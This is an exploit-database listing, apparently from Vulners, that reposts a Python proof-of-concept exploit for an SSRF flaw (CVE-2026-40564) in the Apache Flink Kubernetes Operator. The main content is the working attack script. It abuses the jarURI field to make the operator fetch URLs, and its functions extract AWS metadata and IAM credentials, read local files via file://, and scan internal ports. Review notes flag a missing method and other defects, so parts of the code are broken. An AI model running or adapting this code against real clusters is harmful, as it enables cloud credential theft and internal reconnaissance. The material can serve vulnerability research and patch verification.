Lucene search
K

📄 Apache Flink Kubernetes Operator 1.14.0 Server-Side Request Forgery

🗓️ 16 Jun 2026 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 9 Views

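This is a proof-of-concept exploit for the Apache Flink Kubernetes Operator version 1.14.0 server-side request forgery vulnerability (CVE-2026-40564); it also attempts cloud metadata extraction. Although the listing describes it as a Metasploit module, the published code is a standalone Python 3 script.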

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2026-40564
29 May 202609:32
githubexploit
ATTACKERKB
CVE-2026-40564
26 May 202614:38
attackerkb
Circl
CVE-2026-40564
26 May 202615:20
circl
CNNVD
Apache Flink Kubernetes Operator 安全漏洞
26 May 202600:00
cnnvd
CVE
CVE-2026-40564
26 May 202614:38
cve
Cvelist
CVE-2026-40564 Apache Flink Kubernetes Operator: Server-Side Request Forgery and local file access in Kubernetes Operator
26 May 202614:38
cvelist
EUVD
EUVD-2026-31846
26 May 202614:38
euvd
NVD
CVE-2026-40564
26 May 202616:16
nvd
Packet Storm
📄 Apache Flink Kubernetes Operator 1.14.0 Server-Side Request Forgery
16 Jun 202600:00
packetstorm
Positive Technologies
PT-2026-43265
26 May 202600:00
ptsecurity
Rows per page
==================================================================================================================================
    | # Title     : Apache Flink Kubernetes Operator 1.14.0 SSRF Exploitation Tool with Metadata Extraction                          |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits)                                                 |
    | # Vendor    : https://flink.apache.org/                                                                                        |
    ==================================================================================================================================
    
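    [+] Summary    :  This is a standalone Python proof-of-concept script (not a Metasploit module) for CVE-2026-40564, a Server-Side Request Forgery (SSRF) vulnerability in the Apache Flink Kubernetes Operator. It sets the jarURI field of a FlinkSessionJob resource so that the operator fetches a caller-chosen URL.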
    
    [+] POC        :  
    
    #!/usr/bin/env python3
    
    import argparse
    import base64
    import json
    import sys
    import time
    import urllib.request
    import urllib.parse
    import ssl
    import re
    from typing import Optional, Dict, List, Tuple
    
    class FlinkOperatorSSRF:
        """Proof-of-concept client for CVE-2026-40564 (SSRF via ``jarURI``).

        The class talks to a Kubernetes API server with ``urllib`` and creates
        Flink custom resources whose ``spec.job.jarURI`` points at a chosen URL,
        then inspects the resource's ``status`` (and, in ``check_ssrf``, the
        operator pod logs) for evidence that the operator tried to fetch it.

        Intended for authorized security testing only: every action creates and
        deletes resources in the target cluster.

        NOTE(review): several methods call ``self.create_flink_deployment``,
        which is not defined anywhere in this class as published. Any call with
        ``use_session_cluster=False`` would raise ``AttributeError`` unless the
        method is supplied elsewhere.
        """

        def __init__(self, api_server: str, token: str = None, namespace: str = "default", 
                     verify_ssl: bool = False, timeout: int = 30):
            """Store connection settings and build the TLS context.

            Args:
                api_server: Base URL of the Kubernetes API server; a trailing
                    ``/`` is stripped so paths can be appended directly.
                token: Optional bearer token; when given it is sent in the
                    ``Authorization`` header of every request.
                namespace: Namespace used for all pod and Flink resource paths.
                verify_ssl: When false (the default) certificate and hostname
                    verification are disabled.
                timeout: Per-request timeout in seconds passed to ``urlopen``.
            """
            self.api_server = api_server.rstrip('/')
            self.namespace = namespace
            self.timeout = timeout
            self.verify_ssl = verify_ssl
            self.headers = {
                'Content-Type': 'application/json'
            }
            
            if token:
                self.headers['Authorization'] = f'Bearer {token}'
    
            self.ctx = ssl.create_default_context()
            if not verify_ssl:
                # check_hostname must be cleared before verify_mode can be set
                # to CERT_NONE; the ssl module rejects the opposite order.
                self.ctx.check_hostname = False
                self.ctx.verify_mode = ssl.CERT_NONE
        
        def log(self, msg: str, level: str = "INFO"):
            """Print ``msg`` prefixed with an ANSI-coloured tag for ``level``.

            Unknown levels fall back to an uncoloured ``[*]`` prefix.
            """
            colors = {
                "SUCCESS": "\033[92m[+]\033[0m",
                "ERROR": "\033[91m[-]\033[0m",
                "WARNING": "\033[93m[!]\033[0m",
                "INFO": "\033[96m[*]\033[0m",
                "PROC": "\033[94m[@]\033[0m"
            }
            print(f"{colors.get(level, '[*]')} {msg}")
        
        def k8s_request(self, method: str, path: str, data: dict = None) -> Tuple[Optional[int], Optional[dict]]:
            """Send one request to the Kubernetes API and decode a JSON reply.

            Args:
                method: HTTP method name.
                path: Path (including any query string) appended to
                    ``self.api_server``.
                data: Optional JSON-serialisable body.

            Returns:
                ``(status, parsed_json)`` on success, ``(status, None)`` when the
                response body is empty, ``(http_code, None)`` on an HTTP error,
                and ``(None, None)`` on any other exception.
            """
            url = f"{self.api_server}{path}"
            req = urllib.request.Request(url, method=method, headers=self.headers)
            
            # Truthiness test: an empty dict is treated the same as "no body".
            if data:
                req.add_header('Content-Type', 'application/json')
                req.data = json.dumps(data).encode('utf-8')
            
            try:
                with urllib.request.urlopen(req, context=self.ctx, timeout=self.timeout) as resp:
                    body = resp.read().decode('utf-8')
                    if body:
                        # NOTE(review): a non-JSON body makes json.loads raise;
                        # that is caught by the generic handler below, so the
                        # caller sees (None, None) even for a successful status.
                        return resp.status, json.loads(body)
                    return resp.status, None
            except urllib.error.HTTPError as e:
                if e.code == 409:  # Conflict - resource may already exist
                    return e.code, None
                body = e.read().decode('utf-8') if e.fp else ''
                # Only the first 200 characters of the error body are logged.
                self.log(f"K8s API error: {e.code} - {body[:200]}", "WARNING")
                return e.code, None
            except Exception as e:
                self.log(f"Request failed: {e}", "ERROR")
                return None, None
        
        def find_operator_pod(self) -> Optional[str]:
            """Return the name of the first operator pod in ``self.namespace``.

            A pod matches when its name contains ``flink-kubernetes-operator``
            (case-insensitive). Only the configured namespace is searched.
            Returns ``None`` when the listing fails or nothing matches.
            """
            self.log("Searching for Flink operator pod...", "PROC")
            
            status, pods = self.k8s_request('GET', f'/api/v1/namespaces/{self.namespace}/pods')
            
            if status == 200 and pods:
                for pod in pods.get('items', []):
                    name = pod.get('metadata', {}).get('name', '')
                    if 'flink-kubernetes-operator' in name.lower():
                        self.log(f"Found operator pod: {name}", "SUCCESS")
                        return name
            
            self.log("Could not find operator pod", "WARNING")
            return None
        
        def get_operator_logs(self, pod_name: str, tail_lines: int = 100) -> Optional[str]:
            """Fetch the last ``tail_lines`` log lines of ``pod_name`` as text.

            Returns the log as a string on HTTP 200, otherwise ``None``.

            NOTE(review): ``k8s_request`` JSON-decodes every non-empty body. Pod
            logs are presumably plain text, in which case decoding fails,
            ``k8s_request`` returns ``(None, None)`` and this method returns
            ``None`` - confirm against a real cluster.
            """
            status, logs = self.k8s_request('GET', f'/api/v1/namespaces/{self.namespace}/pods/{pod_name}/log?tailLines={tail_lines}')
            
            if status == 200:
                # A decoded JSON value (or None) is stringified rather than rejected.
                return logs if isinstance(logs, str) else str(logs)
            
            return None
        
        def create_flink_session_job(self, name: str, jar_uri: str) -> bool:
            """Create a ``FlinkSessionJob`` whose ``jarURI`` is ``jar_uri``.

            Args:
                name: Resource name to create in ``self.namespace``.
                jar_uri: URI placed in ``spec.job.jarURI``.

            Returns:
                ``True`` only when the API answers 201; any other status
                (including 409 and request failures) logs an error and
                returns ``False``.
            """
            manifest = {
                "apiVersion": "flink.apache.org/v1beta1",
                "kind": "FlinkSessionJob",
                "metadata": {
                    "name": name,
                    "namespace": self.namespace
                },
                "spec": {
                    "job": {
                        "jarURI": jar_uri,
                        "parallelism": 1,
                        "upgradeMode": "stateless"
                    },
                    "flinkConfiguration": {},
                    "jobManager": {},
                    "taskManager": {}
                }
            }
            
            status, _ = self.k8s_request(
                'POST',
                f'/apis/flink.apache.org/v1beta1/namespaces/{self.namespace}/flinksessionjobs',
                manifest
            )
            
            if status == 201:
                self.log(f"Created FlinkSessionJob: {name}", "SUCCESS")
                return True
            
            self.log(f"Failed to create FlinkSessionJob: HTTP {status}", "ERROR")
            return False
        
        def delete_resource(self, name: str, resource_type: str = 'flinksessionjob') -> bool:
            """Delete the named Flink resource from ``self.namespace``.

            The API path segment is built by appending ``s`` to
            ``resource_type``. Returns ``True`` for HTTP 200, 202 or 204 and
            ``False`` otherwise; a failed delete is not logged here.
            """
            path = f'/apis/flink.apache.org/v1beta1/namespaces/{self.namespace}/{resource_type}s/{name}'
            status, _ = self.k8s_request('DELETE', path)
            
            if status in [200, 202, 204]:
                self.log(f"Deleted {resource_type}: {name}", "SUCCESS")
                return True
            
            return False
        
        def get_resource_status(self, name: str, resource_type: str = 'flinksessionjob') -> Optional[dict]:
            """Fetch the named Flink resource.

            Despite the name, the whole decoded object is returned on HTTP 200
            (callers read its ``status`` key themselves); ``None`` otherwise.
            """
            path = f'/apis/flink.apache.org/v1beta1/namespaces/{self.namespace}/{resource_type}s/{name}'
            status, data = self.k8s_request('GET', path)
            
            if status == 200:
                return data
            
            return None
        
        def check_ssrf(self, jar_uri: str, use_session_cluster: bool = True) -> bool:
            """Create a resource pointing at ``jar_uri`` and look for fetch evidence.

            Steps: create the resource, wait 15 seconds, scan the resource
            status for known fetch-error keywords, scan operator logs for
            ``jar_uri``, then delete the resource.

            Returns:
                ``False`` if the resource could not be created, otherwise
                ``True``.

            NOTE(review): the ``True`` result does not depend on whether any
            keyword or log match was found, so it signals "ran to completion",
            not "confirmed". The resource is also left behind if an exception
            is raised between creation and the final delete.
            """
            resource_type = 'flinksessionjob' if use_session_cluster else 'flinkdeployment'
            # Second-resolution timestamp keeps names unique across slow, sequential runs.
            resource_name = f"ssrf-{int(time.time())}"
            
            self.log(f"Creating SSRF resource: {resource_name}", "PROC")
            self.log(f"Target URL: {jar_uri}")
    
            if use_session_cluster:
                success = self.create_flink_session_job(resource_name, jar_uri)
            else:
                # NOTE(review): create_flink_deployment is not defined in this class.
                success = self.create_flink_deployment(resource_name, jar_uri)
            
            if not success:
                return False
            self.log("Waiting for operator reconciliation (15s)...", "PROC")
            time.sleep(15)
            status = self.get_resource_status(resource_name, resource_type)
            
            if status and status.get('status'):
                status_text = json.dumps(status['status'])
                self.log(f"Resource status: {status_text[:200]}...")
                # Substrings treated as evidence that a fetch was attempted.
                error_keywords = [
                    'Failed to fetch',
                    'Connection refused',
                    'connect timed out',
                    'UnknownHostException',
                    'FileNotFoundException'
                ]
                
                # Only the first matching keyword is reported.
                for keyword in error_keywords:
                    if keyword in status_text:
                        self.log(f"SSRF attempt confirmed: {keyword}", "SUCCESS")
                        break
            operator_pod = self.find_operator_pod()
            if operator_pod:
                self.log("Fetching operator logs...", "PROC")
                logs = self.get_operator_logs(operator_pod, 200)
                
                if logs and jar_uri in logs:
                    self.log(f"SSRF CONFIRMED - operator fetched {jar_uri}", "SUCCESS")
    
                    # The jar_uri test is already implied by the enclosing condition.
                    if 'GET' in logs and jar_uri in logs:
                        self.log("HTTP GET request confirmed in logs", "SUCCESS")
                    ua_match = re.search(r'User-Agent: ([^\n]+)', logs)
                    if ua_match:
                        self.log(f"User-Agent: {ua_match.group(1)}")
            self.log("Cleaning up resources...", "PROC")
            self.delete_resource(resource_name, resource_type)
            
            return True
        
        def read_aws_metadata(self, use_session_cluster: bool = True) -> Optional[dict]:
            """Point ``jarURI`` at each hard-coded metadata URL and collect hits.

            For every URL a resource is created, the method sleeps 10 seconds,
            reads the resource status, and deletes the resource again.

            Returns:
                A dict mapping URL to the JSON-encoded status text for every
                URL whose status mentions ``iam`` or ``security-credentials``,
                or ``None`` when nothing matched.

            NOTE(review): the result of the create call is ignored, so a failed
            create still costs the full sleep and a delete attempt.
            """
            self.log("Attempting to read AWS metadata via SSRF...", "PROC")
            
            metadata_urls = [
                "http://169.254.169.254/latest/meta-data/",
                "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
                "http://169.254.169.254/latest/user-data/",
                "http://169.254.169.254/latest/dynamic/instance-identity/document"
            ]
            results = {}
            for url in metadata_urls:
                self.log(f"Trying: {url}")
                resource_name = f"ssrf-metadata-{int(time.time())}"
                resource_type = 'flinksessionjob' if use_session_cluster else 'flinkdeployment'
                if use_session_cluster:
                    self.create_flink_session_job(resource_name, url)
                else:
                    # NOTE(review): create_flink_deployment is not defined in this class.
                    self.create_flink_deployment(resource_name, url)
                time.sleep(10)
                status = self.get_resource_status(resource_name, resource_type)
                if status and status.get('status'):
                    status_text = json.dumps(status['status'])
    
                    if 'iam' in status_text.lower() or 'security-credentials' in status_text.lower():
                        self.log(f"Metadata found at {url}!", "SUCCESS")
                        # NOTE(review): this pattern matches every alphanumeric
                        # token in the status text, so the "Role" lines below
                        # are not limited to actual role names.
                        roles = re.findall(r'([a-zA-Z0-9\-_]+)', status_text)
                        results[url] = status_text
                        
                        for role in roles:
                            if len(role) > 3 and not role.isdigit():
                                self.log(f"  Role: {role}")
                self.delete_resource(resource_name, resource_type)
                time.sleep(1)
            return results if results else None
        def read_local_file(self, filepath: str, use_session_cluster: bool = True) -> Optional[str]:
            """Point ``jarURI`` at ``file://<filepath>`` and extract any echoed text.

            Creates the resource, sleeps 10 seconds, and searches the
            JSON-encoded status for text following ``Message: ``. Any match is
            printed between separator lines and returned; otherwise ``None``.
            The resource is deleted before returning.

            NOTE(review): the extracted text is whatever follows ``Message: ``
            in the status; whether that is file content or just an error
            message depends on operator behaviour not shown here.
            """
            self.log(f"Attempting to read file: {filepath}", "PROC")
            jar_uri = f"file://{filepath}"
            resource_name = f"ssrf-file-{int(time.time())}"
            resource_type = 'flinksessionjob' if use_session_cluster else 'flinkdeployment'
            if use_session_cluster:
                self.create_flink_session_job(resource_name, jar_uri)
            else:
                # NOTE(review): create_flink_deployment is not defined in this class.
                self.create_flink_deployment(resource_name, jar_uri)
            time.sleep(10)
            status = self.get_resource_status(resource_name, resource_type)
            content = None
            if status and status.get('status'):
                status_text = json.dumps(status['status'])
                if 'file://' in status_text:
                    # Non-greedy capture up to the next double quote or end of text.
                    file_content = re.search(r'Message: (.+?)(?:\"|$)', status_text)
                    if file_content:
                        content = file_content.group(1)
                        self.log(f"File content extracted:", "SUCCESS")
                        print("\n" + "=" * 65)
                        print(content)
                        print("=" * 65)
            
            self.delete_resource(resource_name, resource_type)
            return content
        
        def internal_port_scan(self, host: str, ports: List[int], use_session_cluster: bool = True) -> List[int]:
            """Probe ``host`` on each port by pointing ``jarURI`` at it.

            For every port a resource targeting ``http://host:port/`` is
            created, the method sleeps 5 seconds, classifies the resource
            status, and deletes the resource.

            Returns:
                The ports whose status contained none of ``Connection refused``,
                ``connect timed out`` or ``Failed to fetch``. Ports for which no
                status was available are not reported.
            """
            self.log(f"Scanning {host} ports: {ports}", "PROC")
            
            open_ports = []
            
            for port in ports:
                url = f"http://{host}:{port}/"
                self.log(f"Testing port {port}...")
                
                resource_name = f"ssrf-scan-{port}-{int(time.time())}"
                resource_type = 'flinksessionjob' if use_session_cluster else 'flinkdeployment'
                if use_session_cluster:
                    self.create_flink_session_job(resource_name, url)
                else:
                    # NOTE(review): create_flink_deployment is not defined in this class.
                    self.create_flink_deployment(resource_name, url)
                time.sleep(5)
                status = self.get_resource_status(resource_name, resource_type)
                if status and status.get('status'):
                    status_text = json.dumps(status['status'])
                    
                    if 'Connection refused' in status_text:
                        self.log(f"Port {port}: closed")
                    elif 'connect timed out' in status_text:
                        self.log(f"Port {port}: timeout (maybe filtered)")
                    elif 'Failed to fetch' not in status_text:
                        # Absence of any known failure text is read as "responding".
                        self.log(f"Port {port}: OPEN or responding", "SUCCESS")
                        open_ports.append(port)
                
                self.delete_resource(resource_name, resource_type)
            return open_ports
        def run(self, ssrf_url: str = None, use_session_cluster: bool = True, 
                read_metadata: bool = False, read_file: str = None,
                scan_host: str = None, scan_ports: List[int] = None) -> bool:
            """Check API connectivity, then run exactly one selected action.

            Actions are chosen in this priority order: ``read_metadata``,
            ``read_file``, ``scan_host`` with ``scan_ports``, ``ssrf_url``.

            Returns:
                ``False`` when ``/version`` does not answer 200 or no action is
                selected; otherwise the outcome of the chosen action.

            NOTE(review): when ``read_metadata`` or ``read_file`` is selected
            but yields nothing, the method falls off the end and returns
            ``None`` rather than ``False``, despite the ``bool`` annotation.
            """
            self.log(f"Target: {self.api_server}")
            self.log(f"Namespace: {self.namespace}")
            # Connectivity and credential probe before touching any resources.
            status, _ = self.k8s_request('GET', '/version')
            if status != 200:
                self.log("Cannot connect to Kubernetes API", "ERROR")
                return False
            self.log("Connected to Kubernetes API", "SUCCESS")
            if read_metadata:
                metadata = self.read_aws_metadata(use_session_cluster)
                if metadata:
                    self.log("AWS metadata extraction complete", "SUCCESS")
                    return True
            elif read_file:
                content = self.read_local_file(read_file, use_session_cluster)
                if content:
                    return True
            elif scan_host and scan_ports:
                open_ports = self.internal_port_scan(scan_host, scan_ports, use_session_cluster)
                if open_ports:
                    self.log(f"Open ports: {open_ports}", "SUCCESS")
                return bool(open_ports)
            elif ssrf_url:
                return self.check_ssrf(ssrf_url, use_session_cluster)
            else:
                self.log("No action specified", "ERROR")
                return False
    def main():
        """Parse command-line arguments, run the selected action, and exit.

        The process exits with status 0 when ``FlinkOperatorSSRF.run`` returns
        a truthy value and 1 otherwise. Malformed ``--scan-ports`` values
        (non-numeric entries or ports outside 1-65535) are rejected through
        ``parser.error``, which prints a usage message and exits with status 2
        instead of surfacing a ``ValueError`` traceback. Empty entries caused
        by stray commas are ignored.
        """
        parser = argparse.ArgumentParser(
            description="CVE-2026-40564 - Apache Flink Kubernetes Operator SSRF"
        )
        parser.add_argument("--api-server", required=True, help="Kubernetes API server URL")
        parser.add_argument("--token", help="Bearer token for authentication")
        parser.add_argument("--namespace", default="default", help="Kubernetes namespace")
        parser.add_argument("--insecure", action="store_true", help="Skip SSL verification")
        parser.add_argument("--ssrf-url", help="URL to fetch via SSRF")
        parser.add_argument("--read-aws-metadata", action="store_true", help="Read AWS instance metadata")
        parser.add_argument("--read-file", help="Read local file via file:// scheme")
        parser.add_argument("--scan-host", help="Host to scan for open ports")
        parser.add_argument("--scan-ports", help="Comma-separated ports to scan (e.g., 80,443,8080)")
        parser.add_argument("--use-deployment", action="store_true", help="Use FlinkDeployment instead of FlinkSessionJob")
        parser.add_argument("--timeout", type=int, default=30, help="Request timeout")
        
        args = parser.parse_args()

        # Validate the port list up front so bad input fails as a usage error
        # before any connection is attempted.
        scan_ports = None
        if args.scan_ports:
            scan_ports = []
            for raw_port in args.scan_ports.split(','):
                text = raw_port.strip()
                if not text:
                    continue  # tolerate stray or trailing commas
                try:
                    port = int(text)
                except ValueError:
                    parser.error(f"invalid port in --scan-ports: {text!r}")
                if not 1 <= port <= 65535:
                    parser.error(f"port out of range in --scan-ports: {port}")
                scan_ports.append(port)
            if not scan_ports:
                parser.error("--scan-ports did not contain any port numbers")
        
        print("""
    ╔══════════════════════════════════════════════════════════════════╗
    ║  CVE-2026-40564 - Apache Flink Kubernetes Operator SSRF        ║
    ║  Server-Side Request Forgery via jarURI                        ║
    ╚══════════════════════════════════════════════════════════════════╝
        """)
        
        exploit = FlinkOperatorSSRF(
            api_server=args.api_server,
            token=args.token,
            namespace=args.namespace,
            verify_ssl=not args.insecure,
            timeout=args.timeout
        )
        
        success = exploit.run(
            ssrf_url=args.ssrf_url,
            use_session_cluster=not args.use_deployment,
            read_metadata=args.read_aws_metadata,
            read_file=args.read_file,
            scan_host=args.scan_host,
            scan_ports=scan_ports
        )
        
        sys.exit(0 if success else 1)
    # Run the command-line interface only when executed as a script,
    # not when this module is imported.
    if __name__ == "__main__":
        main()
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Jun 2026 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 3.16.5
EPSS0.00312
SSVC
9